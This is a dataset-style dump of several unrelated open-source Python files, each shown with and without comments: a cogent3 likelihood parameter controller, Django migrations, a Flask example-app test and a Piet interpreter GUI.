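    #
    #   lf.set_time_heterogeneity(
    #       edge_sets=[dict(edges=["Human", "Chimp"], is_independent=True)],
    #   )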
def set_param_rule(
self,
par_name,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
**scope_info,
):
"""Define a model constraint for par_name. Parameters can be set
constant or split according to tree/bin scopes.
Parameters
----------
par_name
The model parameter being modified.
is_constant, value
if True, the parameter is held constant at
            value, if provided, or at the likelihood function's current value.
is_independent
            whether the partitions specified by the scope/bin
arguments are to be considered independent.
lower, init, upper
specify the lower bound, initial value and
upper bound for optimisation. Can be set separately.
bin, bins
            the name(s) of the bin(s) the rule applies to.
        locus, loci
            the name(s) of the locus/loci the rule applies to.
**scope_info
tree scope arguments
            - edge, edges: The name(s) of the tree edge(s) affected by the rule.
            - tip_names: a tuple of two tip names, specifying a tree scope
              the rule applies to.
- outgroup_name: A tip name that, provided along with tip_names,
ensures a consistently specified tree scope.
- clade: The rule applies to all edges descending from the most
recent common ancestor defined by the tip_names+outgroup_name
arguments.
- stem: The rule applies to the edge preceding the most recent
common ancestor defined by the tip_names+outgroup_name
arguments.
"""
par_name = str(par_name)
scopes = {}
for (single, plural) in [
("bin", "bins"),
("locus", "loci"),
("position", "positions"),
("motif", "motifs"),
]:
if single in scope_info:
v = scope_info.pop(single)
if v:
assert isinstance(v, str), "%s=, maybe?" % plural
assert plural not in scope_info
scopes[single] = [v]
elif plural in scope_info:
v = scope_info.pop(plural)
if v:
scopes[single] = v
edges = self._process_scope_info(**scope_info)
if edges:
scopes["edge"] = edges
if is_constant:
assert not (init or lower or upper)
elif init is not None:
assert not value
value = init
self.assign_all(
par_name, scopes, value, lower, upper, is_constant, is_independent
)
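    # Hedged examples of the scope arguments documented above; the parameter
    # and edge names are illustrative assumptions, not taken from this file:
    #
    #   lf.set_param_rule("kappa", edge="Human", is_independent=True)
    #   lf.set_param_rule("kappa", tip_names=["Human", "Mouse"],
    #                     outgroup_name="Opossum", clade=True)
    #   lf.set_param_rule("length", edge="Human", is_constant=True, value=0.1)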
def set_local_clock(self, tip1name, tip2name):
"""Constrain branch lengths for tip1name and tip2name to be equal.
This is a molecular clock condition. Currently only valid for tips
connected to the same node.
        Note: This is just a convenient interface to set_param_rule.
"""
self.set_param_rule(
"length", tip_names=[tip1name, tip2name], clade=True, is_independent=0
)
def set_constant_lengths(self, tree=None, exclude_list=None):
"""Constrains edge lengths to those in the tree.
Parameters
----------
tree
must have the same topology as the current model.
            If not provided, the current tree's lengths are used.
exclude_list
            a list of edge names whose branch lengths
            will be left unconstrained.
"""
exclude_list = exclude_list or []
if tree is None:
tree = self.tree
with self.updates_postponed():
for edge in tree.get_edge_vector():
if edge.length is None or edge.name in exclude_list:
continue
self.set_param_rule(
"length", edge=edge.name, is_constant=1, value=edge.length
)
def get_aic(self, second_order=False):
"""returns Aikake Information Criteria
Parameters
----------
        second_order
            if true, the second-order AIC (AICc), which is
            adjusted by the alignment length, is returned
"""
if second_order:
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index)
for l in self.locus_names
)
else:
sequence_length = None
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return aic(lnL, nfp, sequence_length)
def get_bic(self):
"""returns the Bayesian Information Criteria"""
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index) for l in self.locus_names
)
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return bic(lnL, nfp, sequence_length)
class AlignmentLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
try:
self.assign_all("fixed_motif", None, value=-1, const=True, independent=True)
except KeyError:
pass
def make_likelihood_defn(self, sites_independent=True, discrete_edges=None):
defns = self.model.make_param_controller_defns(bin_names=self.bin_names)
if discrete_edges is not None:
from .discrete_markov import PartialyDiscretePsubsDefn
defns["psubs"] = PartialyDiscretePsubsDefn(
self.motifs, defns["psubs"], discrete_edges
)
return likelihood_calculation.make_total_loglikelihood_defn(
self.tree,
defns["align"],
defns["psubs"],
defns["word_probs"],
defns["bprobs"],
self.bin_names,
self.locus_names,
sites_independent,
)
def set_alignment(self, aligns, motif_pseudocount=None):
"""set the alignment to be used for computing the likelihood."""
if type(aligns) is not list:
aligns = [aligns]
assert len(aligns) == len(self.locus_names), len(aligns)
tip_names = set(self.tree.get_tip_names())
for index, aln in enumerate(aligns):
if len(aligns) > 1:
locus_name = "for locus '%s'" % self.locus_names[index]
else:
locus_name = ""
assert not set(aln.names).symmetric_difference(tip_names), (
"Tree tip names %s and aln seq names %s don't match %s"
% (self.tree.get_tip_names(), aln.names, locus_name)
)
assert "root" not in aln.names, "'root' is a reserved name."
with self.updates_postponed():
for (locus_name, align) in zip(self.locus_names, aligns):
self.assign_all(
"alignment", {"locus": [locus_name]}, value=align, const=True
)
if self.mprobs_from_alignment:
self.set_motif_probs_from_data(
align,
locus=locus_name,
auto=True,
pseudocount=motif_pseudocount,
)
class SequenceLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
pass
def make_likelihood_defn(
self, sites_independent=None, with_indel_params=True, kn=True
):
assert sites_independent is None or not sites_independent
assert len(self.locus_names) == 1
return dp_calculation.make_forward_tree_defn(
self.model,
self.tree,
self.bin_names,
with_indel_params=with_indel_params,
kn=kn,
)
def set_sequences(self, seqs, locus=None):
from cogent3.core.alignment import SequenceCollection
leaves = {}
if isinstance(seqs, SequenceCollection):
seqs = seqs.named_seqs
for (name, seq) in list(seqs.items()):
            # if it has uniq, it's probably already a likelihood tree leaf object
if hasattr(seq, "uniq"):
# XXX more checks - same alphabet as model, name etc ...
leaf = seq
else:
leaf = self.model.convert_sequence(seq, name)
leaf = AlignableSeq(leaf)
leaves[name] = leaf
assert name != "root", "'root' is a reserved name."
self.set_pogs(leaves, locus=locus)
def set_pogs(self, leaves, locus=None):
with self.updates_postponed():
for (name, pog) in list(leaves.items()):
self.set_param_rule("leaf", edge=name, value=pog, is_constant=True)
if self.mprobs_from_alignment:
counts = numpy.sum(
[pog.leaf.get_motif_counts() for pog in list(leaves.values())], 0
)
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(mprobs, locus=locus, is_constant=True, auto=True)
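# A hedged end-to-end sketch, not part of the original module: a parameter
# controller is normally obtained from a substitution model via
# make_likelihood_function(tree), and the rule machinery above is then driven
# through set_param_rule. The file names and model choice are illustrative
# assumptions.
#
#   from cogent3 import load_aligned_seqs, load_tree
#   from cogent3.evolve.models import get_model
#
#   aln = load_aligned_seqs("brca1.fasta", moltype="dna")  # hypothetical path
#   tree = load_tree("brca1.tree")                         # hypothetical path
#   lf = get_model("HKY85").make_likelihood_function(tree)
#   lf.set_alignment(aln)
#   lf.set_param_rule("kappa", is_independent=False)  # one kappa tree-wide
#   lf.optimise(show_progress=False)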
| 34.795918
| 88
| 0.575513
|
import pickle
import warnings
import numpy
from cogent3.align import dp_calculation
from cogent3.align.pairwise import AlignableSeq
from cogent3.core.tree import TreeError
from cogent3.evolve import likelihood_calculation
from cogent3.evolve.likelihood_function import LikelihoodFunction as _LF
from cogent3.maths.stats.information_criteria import aic, bic
from cogent3.recalculation.scope import _indexed
from cogent3.util.misc import adjusted_gt_minprob
from cogent3.util.warning import deprecated, discontinued
__author__ = "Peter Maxwell"
__copyright__ = "Copyright 2007-2019, The Cogent Project"
__credits__ = ["Andrew Butterfield", "Peter Maxwell", "Gavin Huttley", "Helen Lindsay"]
__license__ = "BSD-3"
__version__ = "2019.9.13a"
__maintainer__ = "Gavin Huttley"
__email__ = "gavin.huttley@anu.ed.au"
__status__ = "Production"
def _category_names(dimension, specified):
if type(specified) is int:
cats = ["%s%s" % (dimension, i) for i in range(specified)]
else:
cats = tuple(specified)
assert len(cats) >= 1, cats
assert len(set(cats)) == len(cats), "%s names must be unique" % dimension
return list(cats)
def load(filename):
f = open(filename, "rb")
(version, info, pc) = pickle.load(f)
assert version < 2.0, version
pc.update_intermediate_values()
return pc
class _LikelihoodParameterController(_LF):
    # Basically a wrapper around the more generic recalculation.ParameterController
# class, which doesn't know about trees.
def __init__(
self,
model,
tree,
bins=1,
loci=1,
optimise_motif_probs=False,
motif_probs_from_align=False,
**kw,
):
self._serialisable = locals()
for key in ("self", "__class__", "kw"):
self._serialisable.pop(key)
self._serialisable.update(kw)
self.model = self._model = model
self.tree = self._tree = tree
self.seq_names = tree.get_tip_names()
self.locus_names = _category_names("locus", loci)
self.bin_names = _category_names("bin", bins)
self.posn_names = [str(i) for i in range(model.word_length)]
self.motifs = self._motifs = model.get_motifs()
self._mprob_motifs = list(model.get_mprob_alphabet())
defn = self.make_likelihood_defn(**kw)
super(_LF, self).__init__(defn)
self.set_default_param_rules()
self.set_default_tree_parameter_rules()
self.mprobs_from_alignment = motif_probs_from_align
self.optimise_motif_probs = optimise_motif_probs
self._name = ""
self._format = {}
def save(self, filename):
with open(filename, "w") as f:
temp = {}
try:
for d in self.defns:
temp[id(d)] = d.values
del d.values
pickle.dump((1.0, None, self), f)
finally:
for d in self.defns:
if id(d) in temp:
d.values = temp[id(d)]
def set_default_tree_parameter_rules(self):
with self.updates_postponed():
edges = self.tree.get_edge_vector()
for par_name in self.model.get_param_list():
try:
values = dict(
[
(edge.name, edge.params[par_name])
for edge in edges
if not edge.isroot()
]
)
(uniq, index) = _indexed(values)
except KeyError:
                    continue
                for (u, value) in enumerate(uniq):
group = [edge for (edge, i) in list(index.items()) if i == u]
self.set_param_rule(par_name, edges=group, init=value)
for edge in edges:
if edge.length is not None:
try:
self.set_param_rule("length", edge=edge.name, init=edge.length)
except KeyError:
warnings.warn("Ignoring tree edge lengths", stacklevel=4)
break
def set_motif_probs_from_data(
self,
align,
locus=None,
is_constant=None,
include_ambiguity=False,
is_independent=None,
auto=False,
pseudocount=None,
**kwargs,
):
counts = self.model.count_motifs(align, include_ambiguity=include_ambiguity)
if is_constant is None:
is_constant = not self.optimise_motif_probs
if pseudocount is None:
if is_constant:
pseudocount = 0.0
else:
pseudocount = 0.5
counts += pseudocount
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(
mprobs,
locus=locus,
is_constant=is_constant,
is_independent=is_independent,
auto=auto,
**kwargs,
)
def set_motif_probs(
self,
motif_probs,
locus=None,
bin=None,
is_constant=None,
is_independent=None,
auto=False,
**kwargs,
):
motif_probs = self.model.adapt_motif_probs(motif_probs, auto=auto)
motif_probs = adjusted_gt_minprob(motif_probs, minprob=1e-6)
if is_constant is None:
is_constant = not self.optimise_motif_probs
self.model.set_param_controller_motif_probs(
self,
motif_probs,
is_constant=is_constant,
bin=bin,
locus=locus,
is_independent=is_independent,
**kwargs,
)
if not auto:
self.mprobs_from_alignment = False
def set_expm(self, expm):
assert expm in ["pade", "either", "eigen", "checked"], expm
self.set_param_rule("expm", is_constant=True, value=expm)
def make_calculator(self, **kw):
return super(_LF, self).make_calculator(**kw)
def _process_scope_info(
self,
edge=None,
tip_names=None,
edges=None,
clade=None,
stem=None,
outgroup_name=None,
):
if edges is not None:
if tip_names or edge:
raise TreeError("Only ONE of edge, edges or tip_names")
elif edge is not None:
if tip_names:
raise TreeError("Only ONE of edge, edges or tip_names")
edges = [edge]
elif tip_names is None:
            edges = None
        elif len(tip_names) != 2:
raise TreeError("tip_names must contain 2 species")
else:
(species1, species2) = tip_names
if stem is None:
stem = False
if clade is None:
clade = not stem
edges = self.tree.get_edge_names(
species1, species2, stem=stem, clade=clade, outgroup_name=outgroup_name
)
return edges
def apply_param_rules(self, rules):
with self.updates_postponed():
for rule in rules:
self.set_param_rule(**rule)
def set_time_heterogeneity(
self,
exclude_params=None,
edge_sets=None,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
):
if is_constant and any([lower, init, upper]):
raise ValueError("cannot specify bounds or init for a constant param")
if is_constant:
kwargs = dict(is_constant=True, value=value)
else:
kwargs = dict(
is_independent=is_independent, init=init, lower=lower, upper=upper
)
rate_terms = self._model.get_param_list()
exclude_params = exclude_params or []
if exclude_params and type(exclude_params) == str:
exclude_params = [exclude_params]
for param in exclude_params:
if param not in rate_terms:
raise ValueError(f"'{param}' not a valid rate param")
rate_terms.remove(param)
if edge_sets is None:
edge_sets = [
dict(edges=[n]) for n in self.tree.get_node_names(includeself=False)
]
elif type(edge_sets) == dict:
edge_sets = [edge_sets]
param_rules = []
for edge_set in edge_sets:
edges = edge_set.get("edges", None)
if type(edges) == str:
edges = [edges]
if edges:
edges = list(edges)
edge_set["edges"] = edges
rule_base = kwargs.copy()
rule_base.update(edge_set)
for param in rate_terms:
rule = rule_base.copy()
rule.update(dict(par_name=param))
param_rules.append(rule)
self.apply_param_rules(param_rules)
def set_param_rule(
self,
par_name,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
**scope_info,
):
par_name = str(par_name)
scopes = {}
for (single, plural) in [
("bin", "bins"),
("locus", "loci"),
("position", "positions"),
("motif", "motifs"),
]:
if single in scope_info:
v = scope_info.pop(single)
if v:
assert isinstance(v, str), "%s=, maybe?" % plural
assert plural not in scope_info
scopes[single] = [v]
elif plural in scope_info:
v = scope_info.pop(plural)
if v:
scopes[single] = v
edges = self._process_scope_info(**scope_info)
if edges:
scopes["edge"] = edges
if is_constant:
assert not (init or lower or upper)
elif init is not None:
assert not value
value = init
self.assign_all(
par_name, scopes, value, lower, upper, is_constant, is_independent
)
def set_local_clock(self, tip1name, tip2name):
self.set_param_rule(
"length", tip_names=[tip1name, tip2name], clade=True, is_independent=0
)
def set_constant_lengths(self, tree=None, exclude_list=None):
exclude_list = exclude_list or []
if tree is None:
tree = self.tree
with self.updates_postponed():
for edge in tree.get_edge_vector():
if edge.length is None or edge.name in exclude_list:
continue
self.set_param_rule(
"length", edge=edge.name, is_constant=1, value=edge.length
)
def get_aic(self, second_order=False):
if second_order:
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index)
for l in self.locus_names
)
else:
sequence_length = None
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return aic(lnL, nfp, sequence_length)
def get_bic(self):
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index) for l in self.locus_names
)
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return bic(lnL, nfp, sequence_length)
class AlignmentLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
try:
self.assign_all("fixed_motif", None, value=-1, const=True, independent=True)
except KeyError:
pass
def make_likelihood_defn(self, sites_independent=True, discrete_edges=None):
defns = self.model.make_param_controller_defns(bin_names=self.bin_names)
if discrete_edges is not None:
from .discrete_markov import PartialyDiscretePsubsDefn
defns["psubs"] = PartialyDiscretePsubsDefn(
self.motifs, defns["psubs"], discrete_edges
)
return likelihood_calculation.make_total_loglikelihood_defn(
self.tree,
defns["align"],
defns["psubs"],
defns["word_probs"],
defns["bprobs"],
self.bin_names,
self.locus_names,
sites_independent,
)
def set_alignment(self, aligns, motif_pseudocount=None):
if type(aligns) is not list:
aligns = [aligns]
assert len(aligns) == len(self.locus_names), len(aligns)
tip_names = set(self.tree.get_tip_names())
for index, aln in enumerate(aligns):
if len(aligns) > 1:
locus_name = "for locus '%s'" % self.locus_names[index]
else:
locus_name = ""
assert not set(aln.names).symmetric_difference(tip_names), (
"Tree tip names %s and aln seq names %s don't match %s"
% (self.tree.get_tip_names(), aln.names, locus_name)
)
assert "root" not in aln.names, "'root' is a reserved name."
with self.updates_postponed():
for (locus_name, align) in zip(self.locus_names, aligns):
self.assign_all(
"alignment", {"locus": [locus_name]}, value=align, const=True
)
if self.mprobs_from_alignment:
self.set_motif_probs_from_data(
align,
locus=locus_name,
auto=True,
pseudocount=motif_pseudocount,
)
class SequenceLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
pass
def make_likelihood_defn(
self, sites_independent=None, with_indel_params=True, kn=True
):
assert sites_independent is None or not sites_independent
assert len(self.locus_names) == 1
return dp_calculation.make_forward_tree_defn(
self.model,
self.tree,
self.bin_names,
with_indel_params=with_indel_params,
kn=kn,
)
def set_sequences(self, seqs, locus=None):
from cogent3.core.alignment import SequenceCollection
leaves = {}
if isinstance(seqs, SequenceCollection):
seqs = seqs.named_seqs
for (name, seq) in list(seqs.items()):
# if it has uniq, it is probably already a likelihood tree leaf object
if hasattr(seq, "uniq"):
# XXX more checks - same alphabet as model, name etc ...
leaf = seq
else:
leaf = self.model.convert_sequence(seq, name)
leaf = AlignableSeq(leaf)
leaves[name] = leaf
assert name != "root", "'root' is a reserved name."
self.set_pogs(leaves, locus=locus)
def set_pogs(self, leaves, locus=None):
with self.updates_postponed():
for (name, pog) in list(leaves.items()):
self.set_param_rule("leaf", edge=name, value=pog, is_constant=True)
if self.mprobs_from_alignment:
counts = numpy.sum(
[pog.leaf.get_motif_counts() for pog in list(leaves.values())], 0
)
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(mprobs, locus=locus, is_constant=True, auto=True)
| true
| true
|
f707c24839da39506721babe09f891449d8663ef
| 1,036
|
py
|
Python
|
bmat_app/migrations/0001_initial.py
|
dlouky/bmat_test_dlouky
|
970cbfb04c2f55a1a29ffb09b94db360720b36e1
|
[
"MIT"
] | null | null | null |
bmat_app/migrations/0001_initial.py
|
dlouky/bmat_test_dlouky
|
970cbfb04c2f55a1a29ffb09b94db360720b36e1
|
[
"MIT"
] | null | null | null |
bmat_app/migrations/0001_initial.py
|
dlouky/bmat_test_dlouky
|
970cbfb04c2f55a1a29ffb09b94db360720b36e1
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.4 on 2021-07-05 08:34
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="MusicalWork",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("title", models.CharField(max_length=60, null=True)),
(
"contributors",
django.contrib.postgres.fields.ArrayField(
base_field=models.CharField(max_length=60), size=None
),
),
("iswc", models.CharField(max_length=11, null=True, unique=True)),
],
),
]
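# For reference, a hypothetical model that would produce the migration above
# (field definitions are taken from the operations; the class body is a sketch):
# class MusicalWork(models.Model):
#     title = models.CharField(max_length=60, null=True)
#     contributors = ArrayField(models.CharField(max_length=60))
#     iswc = models.CharField(max_length=11, null=True, unique=True)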
| 28
| 82
| 0.454633
|
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="MusicalWork",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("title", models.CharField(max_length=60, null=True)),
(
"contributors",
django.contrib.postgres.fields.ArrayField(
base_field=models.CharField(max_length=60), size=None
),
),
("iswc", models.CharField(max_length=11, null=True, unique=True)),
],
),
]
| true
| true
|
f707c3d48ff3381958bab352d03ceae35bf3abc1
| 1,280
|
py
|
Python
|
tests/test_examples_app.py
|
kprzerwa/cds-migrator-kit
|
443126e435483be460b0d48295f4878ada1e9445
|
[
"MIT"
] | null | null | null |
tests/test_examples_app.py
|
kprzerwa/cds-migrator-kit
|
443126e435483be460b0d48295f4878ada1e9445
|
[
"MIT"
] | null | null | null |
tests/test_examples_app.py
|
kprzerwa/cds-migrator-kit
|
443126e435483be460b0d48295f4878ada1e9445
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# cds-migrator-kit is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test example app."""
import os
import signal
import subprocess
import time
from os.path import abspath, dirname, join
import pytest
@pytest.yield_fixture
def example_app():
"""Example app fixture."""
current_dir = os.getcwd()
# Go to example directory
project_dir = dirname(dirname(abspath(__file__)))
exampleapp_dir = join(project_dir, 'examples')
os.chdir(exampleapp_dir)
# Setup application
assert subprocess.call('./app-setup.sh', shell=True) == 0
# Start example app
webapp = subprocess.Popen(
'FLASK_APP=app.py flask run --debugger -p 5000',
stdout=subprocess.PIPE, preexec_fn=os.setsid, shell=True)
time.sleep(10)
yield webapp
# Stop server
os.killpg(webapp.pid, signal.SIGTERM)
# Return to the original directory
os.chdir(current_dir)
def test_example_app_role_admin(example_app):
"""Test example app."""
cmd = 'curl http://0.0.0.0:5000/'
output = subprocess.check_output(cmd, shell=True)
assert b'migrator' in output
| 24.615385
| 77
| 0.690625
|
import os
import signal
import subprocess
import time
from os.path import abspath, dirname, join
import pytest
@pytest.yield_fixture
def example_app():
current_dir = os.getcwd()
project_dir = dirname(dirname(abspath(__file__)))
exampleapp_dir = join(project_dir, 'examples')
os.chdir(exampleapp_dir)
assert subprocess.call('./app-setup.sh', shell=True) == 0
webapp = subprocess.Popen(
'FLASK_APP=app.py flask run --debugger -p 5000',
stdout=subprocess.PIPE, preexec_fn=os.setsid, shell=True)
time.sleep(10)
yield webapp
os.killpg(webapp.pid, signal.SIGTERM)
os.chdir(current_dir)
def test_example_app_role_admin(example_app):
cmd = 'curl http://0.0.0.0:5000/'
output = subprocess.check_output(cmd, shell=True)
assert b'migrator' in output
| true
| true
|
f707c417fb0814be2f4aec97fbb1c3e8d5524efa
| 1,189
|
py
|
Python
|
flowcelltool/flowcells/migrations/0006_auto_20180320_0622.py
|
bihealth/flowcelltool
|
6e16190fc34c54d834ecd23888a462f3af47611d
|
[
"MIT"
] | 7
|
2016-10-12T12:56:09.000Z
|
2020-10-27T17:08:09.000Z
|
flowcelltool/flowcells/migrations/0006_auto_20180320_0622.py
|
iamh2o/flowcelltool
|
6e16190fc34c54d834ecd23888a462f3af47611d
|
[
"MIT"
] | 94
|
2016-10-24T06:28:31.000Z
|
2018-08-06T10:35:13.000Z
|
flowcelltool/flowcells/migrations/0006_auto_20180320_0622.py
|
iamh2o/flowcelltool
|
6e16190fc34c54d834ecd23888a462f3af47611d
|
[
"MIT"
] | 1
|
2022-03-23T15:57:16.000Z
|
2022-03-23T15:57:16.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-03-20 06:22
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('flowcells', '0005_auto_20180319_0947'),
]
operations = [
migrations.AddField(
model_name='barcodeset',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='barcodesetentry',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='flowcell',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='library',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='sequencingmachine',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
]
| 28.309524
| 71
| 0.583684
|
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('flowcells', '0005_auto_20180319_0947'),
]
operations = [
migrations.AddField(
model_name='barcodeset',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='barcodesetentry',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='flowcell',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='library',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='sequencingmachine',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
]
| true
| true
|
f707c48e4faab8a4f1b78efa7e6f01738bce697e
| 5,615
|
py
|
Python
|
ctf/2021 Google/piet_interpreter/GUI/main.py
|
jacobshu/binder
|
517494d688fd4b92f53e005daaea3d1b8e3083d6
|
[
"MIT"
] | 12
|
2020-11-14T22:59:38.000Z
|
2022-03-14T00:51:03.000Z
|
ctf/2021 Google/piet_interpreter/GUI/main.py
|
jacobshu/binder
|
517494d688fd4b92f53e005daaea3d1b8e3083d6
|
[
"MIT"
] | 2
|
2020-11-23T09:22:47.000Z
|
2021-09-15T12:25:02.000Z
|
ctf/2021 Google/piet_interpreter/GUI/main.py
|
jacobshu/binder
|
517494d688fd4b92f53e005daaea3d1b8e3083d6
|
[
"MIT"
] | 5
|
2020-10-26T12:12:14.000Z
|
2022-01-30T01:42:16.000Z
|
import pygubu
import os
from interpreter import imageFunctions as imageWrapper
from interpreter import lexer as lexer
from interpreter import executeFunctions as main
from interpreter.dataStructures import programState, direction, position
from GUI import infoManager
from GUI import canvasManager
class GUI:
def __init__(self):
# In pixelWidth/height per pixel. scaleSize = 25 means that every pixel will show as a 25x25 square
self.scaleSize = 15
# In percentage
self.executionSpeed = 15
# In seconds
self.maxWait = 5
self.image = None
self.graph = None
self.programState = None
self.selectedPosition = None
self.optionBar = None
self.actionBar = None
self.content = None
self.canvas = None
#1: Create a builder
self.builder = pygubu.Builder()
#2: Load an ui file
self.builder.add_from_file("{}/tkinterLayout.ui".format(os.path.abspath(os.path.dirname(__file__))))
#3: Create the mainwindow
self.mainwindow = self.builder.get_object('rootWindow')
self.initializeFrames()
self.initializeCallbacks()
self.infoManager = infoManager.infoManager(self.builder, self.generalInfoFrame, self.programStateInfoFrame)
self.canvasManager = canvasManager.canvasManager(self.canvas, self.image, self.programState, self.scaleSize)
def run(self):
self.mainwindow.mainloop()
def initializeCallbacks(self):
self.builder.connect_callbacks({
'loadFile': self.loadFile,
'setScale': self.setScale,
'takeStep': self.takeStep
})
horizontalBar = self.builder.get_object("canvasHorizontalScroll", self.canvasFrame)
verticalBar = self.builder.get_object("canvasVerticalScroll", self.canvasFrame)
horizontalBar.config(command = self.canvas.xview)
verticalBar.config(command = self.canvas.yview)
self.canvas.config(xscrollcommand=horizontalBar.set, yscrollcommand=verticalBar.set)
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def initializeFrames(self):
self.optionBar = self.builder.get_object('optionBar', self.mainwindow)
self.content = self.builder.get_object('content', self.mainwindow)
self.actionBar = self.builder.get_object('actionBar', self.mainwindow)
self.generalInfoFrame = self.builder.get_object("generalInfoFrame", self.content)
self.programStateInfoFrame = self.builder.get_object("programStateInfoFrame", self.content)
self.canvasFrame = self.builder.get_object('canvasFrame', self.content)
self.canvas = self.builder.get_object('canvas', self.canvasFrame)
def update(self):
self.infoManager.updateInfo(self.image, self.graph, self.programState)
self.canvasManager.updateScaleSize(self.scaleSize)
self.canvasManager.updateImage(self.image)
self.canvasManager.updateProgramState(self.programState)
self.canvasManager.updateCanvas()
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def takeStep(self):
if self.image is None or self.programState is None or self.graph is None:
return None
newProgramState = main.takeStep(self.image, self.programState)
# Error encountered, close window
if isinstance(newProgramState, BaseException):
self.mainwindow.destroy()
self.mainwindow.quit()
raise newProgramState
self.programState = newProgramState
self.selectedPosition = self.programState.position
self.update()
return True
def setFileText(self, filePath):
self.builder.get_object("fileNameEntry", self.optionBar).delete(0, len(self.builder.get_object("fileNameEntry", self.optionBar).get()))
self.builder.get_object("fileNameEntry", self.optionBar).insert(0, filePath)
def setExecutionSpeed(self, pos):
if 0 < float(pos) < 100:
self.executionSpeed = float(pos)
def setScale(self):
scaleValue = int(self.builder.get_object('scaleEntry', self.optionBar).get())
if 0 < scaleValue < 100:
self.canvasManager.clearCanvas()
self.scaleSize = int(scaleValue)
self.update()
self.canvasManager.drawImage()
self.canvasManager.updateCanvas()
def loadFile(self):
fileName = self.builder.get_object('fileNameEntry', self.optionBar).get()
if len(fileName) < 1:
return None
try:
tmpImage = imageWrapper.getImage(fileName)
except FileNotFoundError:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The file '{}' could not be found".format(fileName))
return False
tmpResult = lexer.graphImage(tmpImage)
if len(tmpResult[1]) != 0:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The following exceptions occured while making the graph:\n{}".format("".join(list(map(lambda x: "\t{}\n".format(x), tmpResult[1])))))
return False
self.image = tmpImage
self.graph = tmpResult[0]
self.programState = programState(self.graph, position((0,0)), direction((0,0)))
# Reset previous state
self.canvasManager.previousProgramState = None
self.canvasManager.programState = None
self.update()
| 38.197279
| 170
| 0.674443
|
import pygubu
import os
from interpreter import imageFunctions as imageWrapper
from interpreter import lexer as lexer
from interpreter import executeFunctions as main
from interpreter.dataStructures import programState, direction, position
from GUI import infoManager
from GUI import canvasManager
class GUI:
def __init__(self):
self.scaleSize = 15
self.executionSpeed = 15
self.maxWait = 5
self.image = None
self.graph = None
self.programState = None
self.selectedPosition = None
self.optionBar = None
self.actionBar = None
self.content = None
self.canvas = None
self.builder = pygubu.Builder()
self.builder.add_from_file("{}/tkinterLayout.ui".format(os.path.abspath(os.path.dirname(__file__))))
self.mainwindow = self.builder.get_object('rootWindow')
self.initializeFrames()
self.initializeCallbacks()
self.infoManager = infoManager.infoManager(self.builder, self.generalInfoFrame, self.programStateInfoFrame)
self.canvasManager = canvasManager.canvasManager(self.canvas, self.image, self.programState, self.scaleSize)
def run(self):
self.mainwindow.mainloop()
def initializeCallbacks(self):
self.builder.connect_callbacks({
'loadFile': self.loadFile,
'setScale': self.setScale,
'takeStep': self.takeStep
})
horizontalBar = self.builder.get_object("canvasHorizontalScroll", self.canvasFrame)
verticalBar = self.builder.get_object("canvasVerticalScroll", self.canvasFrame)
horizontalBar.config(command = self.canvas.xview)
verticalBar.config(command = self.canvas.yview)
self.canvas.config(xscrollcommand=horizontalBar.set, yscrollcommand=verticalBar.set)
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def initializeFrames(self):
self.optionBar = self.builder.get_object('optionBar', self.mainwindow)
